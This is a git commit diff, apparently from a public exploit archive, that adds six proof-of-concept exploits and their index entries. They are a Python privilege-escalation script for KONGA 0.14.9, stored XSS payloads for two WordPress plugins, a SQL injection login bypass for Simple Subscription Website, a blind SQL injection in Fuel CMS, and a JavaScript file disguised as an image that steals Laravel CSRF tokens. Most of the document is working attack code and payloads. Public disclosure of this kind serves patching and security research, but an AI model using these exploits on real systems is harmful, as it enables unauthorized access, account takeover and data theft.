DB: 2021-11-16
6 changes to exploits/shellcodes WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS) KONGA 0.14.9 - Privilege Escalation Simple Subscription Website 1.0 - SQLi Authentication Bypass Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated) PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
This commit is contained in:
parent
a7e24bac97
commit
412b034ee9
7 changed files with 227 additions and 0 deletions
54
exploits/multiple/webapps/50521.py
Executable file
54
exploits/multiple/webapps/50521.py
Executable file
|
@ -0,0 +1,54 @@
|
||||||
|
# Exploit Title: KONGA 0.14.9 - Privilege Escalation
|
||||||
|
# Date: 10/11/2021
|
||||||
|
# Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)
|
||||||
|
# Vendor Homepage: https://github.com/pantsel/konga
|
||||||
|
# Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip
|
||||||
|
# Version: 0.14.9
|
||||||
|
# Tested on: Linux - Ubuntu 20.04.3 LTS (focal)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import json
|
||||||
|
|
||||||
|
urlkonga = "http://www.example.com:1337/" # change to your konga address
|
||||||
|
identifier = "usernormalkonga" # change user
|
||||||
|
password = "changeme" # change password
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
|
||||||
|
"Content-Type": "application/json;charset=utf-8",
|
||||||
|
"connection-id": "",
|
||||||
|
"Origin": urlkonga,
|
||||||
|
"Referer": urlkonga
|
||||||
|
}
|
||||||
|
|
||||||
|
url = urlkonga+"login"
|
||||||
|
|
||||||
|
data = {
|
||||||
|
"identifier":identifier,
|
||||||
|
"password":password
|
||||||
|
}
|
||||||
|
|
||||||
|
response = requests.post(url, json=data)
|
||||||
|
json_object = json.loads(response.text)
|
||||||
|
print("[+] Attack")
|
||||||
|
print("[+] Token " + json_object["token"])
|
||||||
|
|
||||||
|
url2 = urlkonga+"api/user/"+str(json_object["user"]["id"])
|
||||||
|
id = json_object["user"]["id"]
|
||||||
|
print("[+] Exploiting User ID "+str(json_object["user"]["id"]))
|
||||||
|
|
||||||
|
data2 = {
|
||||||
|
"admin": "true",
|
||||||
|
"passports": {
|
||||||
|
"password": password,
|
||||||
|
"protocol": "local"
|
||||||
|
},
|
||||||
|
"password_confirmation": password,
|
||||||
|
"token":json_object["token"]
|
||||||
|
}
|
||||||
|
|
||||||
|
print("[+] Change Normal User to Admin")
|
||||||
|
response2 = requests.put(url2, headers=headers, json=data2)
|
||||||
|
print("[+] Success")
|
31
exploits/php/webapps/50520.txt
Normal file
31
exploits/php/webapps/50520.txt
Normal file
|
@ -0,0 +1,31 @@
|
||||||
|
# Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
|
||||||
|
# Date: 20/08/2021
|
||||||
|
# Exploit Author: Davide Taraschi
|
||||||
|
# Vendor Homepage: https://wpschoolpress.com/
|
||||||
|
# Software Link: https://wpschoolpress.com/free-download/
|
||||||
|
# Version: up to 2.1.17 (non included)
|
||||||
|
# Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2
|
||||||
|
# CVE : CVE-2021-24664
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues.
|
||||||
|
The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript.
|
||||||
|
|
||||||
|
# PoC:
|
||||||
|
As admin,
|
||||||
|
- Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)//
|
||||||
|
The XSS will be triggered when adding another teacher attendance by clicking on the Add button
|
||||||
|
|
||||||
|
- Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
|
||||||
|
The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button
|
||||||
|
|
||||||
|
- Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)//
|
||||||
|
The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3)
|
||||||
|
|
||||||
|
- Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)//
|
||||||
|
The XSS will be triggered when editing the Subject
|
||||||
|
|
||||||
|
- Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)//
|
||||||
|
The XSS will be triggered when editing the Exam=20
|
||||||
|
|
||||||
|
Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies.
|
28
exploits/php/webapps/50522.txt
Normal file
28
exploits/php/webapps/50522.txt
Normal file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass
|
||||||
|
# Exploit Author: Daniel Haro (Dirox)
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
|
||||||
|
# Version: Simple Subscription Website 1.0
|
||||||
|
# Tested on: Windows, xampp
|
||||||
|
# CVE: CVE-2021-43140
|
||||||
|
|
||||||
|
- Description:
|
||||||
|
SQL Injection vulnerability exists in Sourcecodester. Simple Subscription Website 1.0. An account takeover exists with the payload: admin' or 1=1-- -
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
|
||||||
|
POST /plan_application/Actions.php?a=login HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 57
|
||||||
|
Origin: http://127.0.0.1
|
||||||
|
Connection: close
|
||||||
|
Referer: http://127.0.0.1/plan_application/admin/login.php
|
||||||
|
Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3
|
||||||
|
|
||||||
|
username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-
|
23
exploits/php/webapps/50523.txt
Normal file
23
exploits/php/webapps/50523.txt
Normal file
|
@ -0,0 +1,23 @@
|
||||||
|
# Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
|
||||||
|
# Date: 2021-04-11
|
||||||
|
# Exploit Author: Rahad Chowdhury
|
||||||
|
# Vendor Homepage: https://www.getfuelcms.com/
|
||||||
|
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
|
||||||
|
# Version: 1.4.13
|
||||||
|
# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46
|
||||||
|
|
||||||
|
Steps to Reproduce:
|
||||||
|
1. At first login your panel
|
||||||
|
2. then go to "Activity Log" menu
|
||||||
|
3. then select any type option
|
||||||
|
4. their "col" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in "col=" parameter.
|
||||||
|
|
||||||
|
POC:
|
||||||
|
http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date
|
||||||
|
and (select * from(select(sleep(1)))a)&fuel_inline=0
|
||||||
|
|
||||||
|
Output:
|
||||||
|
By issuing sleep(0) response will be delayed to 0 seconds.
|
||||||
|
By issuing sleep(1) response will be delayed to 1 seconds.
|
||||||
|
By issuing sleep(5) response will be delayed to 5 seconds.
|
||||||
|
By issuing sleep(10) response will be delayed to 10 seconds
|
16
exploits/php/webapps/50524.txt
Normal file
16
exploits/php/webapps/50524.txt
Normal file
|
@ -0,0 +1,16 @@
|
||||||
|
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
|
||||||
|
# Date: 11/11/2021
|
||||||
|
# Exploit Author: Mohammed Aadhil Ashfaq
|
||||||
|
# Vendor Homepage: https://form2email.dwbooster.com/
|
||||||
|
# Version: 1.3.24
|
||||||
|
# Tested on: wordpress
|
||||||
|
|
||||||
|
POC
|
||||||
|
1. Click Contact form to Email
|
||||||
|
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
|
||||||
|
2. Create new form name with <script>alert(1)</script>
|
||||||
|
3. Click Publish
|
||||||
|
4. XSS has been triggered
|
||||||
|
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
|
||||||
|
5. Open a different browser, logged in with wordpress. Copy the URL and
|
||||||
|
Press enter. XSS will trigger.
|
69
exploits/php/webapps/50525.txt
Normal file
69
exploits/php/webapps/50525.txt
Normal file
|
@ -0,0 +1,69 @@
|
||||||
|
# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
|
||||||
|
# Date: 14/11/2021
|
||||||
|
# Exploit Author: Hosein Vita
|
||||||
|
# Vendor Homepage: https://laravel.com/
|
||||||
|
# Software Link: https://laravel.com/docs/4.2
|
||||||
|
# Version: Laravel Framework 8.70.1
|
||||||
|
# Tested on: Windows/Linux
|
||||||
|
|
||||||
|
# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
|
||||||
|
# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
|
||||||
|
|
||||||
|
# Steps to reproduce:
|
||||||
|
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
|
||||||
|
2- Use code below to bypass csrf token
|
||||||
|
|
||||||
|
ÿØÿà<html>
|
||||||
|
<head>
|
||||||
|
<title>Laravel Csrf Bypass</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<script>
|
||||||
|
function submitFormWithTokenJS(token) {
|
||||||
|
var xhr = new XMLHttpRequest();
|
||||||
|
xhr.open("POST", POST_URL, true);
|
||||||
|
|
||||||
|
// Send the proper header information along with the request
|
||||||
|
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
|
||||||
|
|
||||||
|
// This is for debugging and can be removed
|
||||||
|
xhr.onreadystatechange = function() {
|
||||||
|
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
|
||||||
|
console.log(xhr.responseText);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
//
|
||||||
|
xhr.send("_token=" + token + "&desiredParameter=desiredValue");
|
||||||
|
}
|
||||||
|
|
||||||
|
function getTokenJS() {
|
||||||
|
var xhr = new XMLHttpRequest();
|
||||||
|
// This tels it to return it as a HTML document
|
||||||
|
xhr.responseType = "document";
|
||||||
|
// true on the end of here makes the call asynchronous
|
||||||
|
//Edit the path as you want
|
||||||
|
xhr.open("GET", "/image-upload", true);
|
||||||
|
xhr.onload = function (e) {
|
||||||
|
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
|
||||||
|
// Get the document from the response
|
||||||
|
page = xhr.response
|
||||||
|
// Get the input element
|
||||||
|
input = page.getElementsByTagName("input")[0];
|
||||||
|
// Show the token
|
||||||
|
alert("The token is: " + input.value);
|
||||||
|
// Use the token to submit the form
|
||||||
|
submitFormWithTokenJS(input.value);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
// Make the request
|
||||||
|
xhr.send(null);
|
||||||
|
}
|
||||||
|
getTokenJS();
|
||||||
|
|
||||||
|
var POST_URL="/"
|
||||||
|
getTokenJS();
|
||||||
|
|
||||||
|
</script>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
3- Save it as Html file and upload it.
|
|
@ -44616,3 +44616,9 @@ id,file,description,date,author,type,platform,port
|
||||||
50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
|
50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
|
||||||
50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
|
50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
|
||||||
50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",1970-01-01,"Shain Lakin",webapps,multiple,
|
50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",1970-01-01,"Shain Lakin",webapps,multiple,
|
||||||
|
50520,exploits/php/webapps/50520.txt,"WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Davide Taraschi",webapps,php,
|
||||||
|
50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",1970-01-01,"Fabricio Salomao",webapps,multiple,
|
||||||
|
50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",1970-01-01,"Daniel Haro",webapps,php,
|
||||||
|
50523,exploits/php/webapps/50523.txt,"Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
|
||||||
|
50524,exploits/php/webapps/50524.txt,"WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mohammed Aadhil Ashfaq",webapps,php,
|
||||||
|
50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue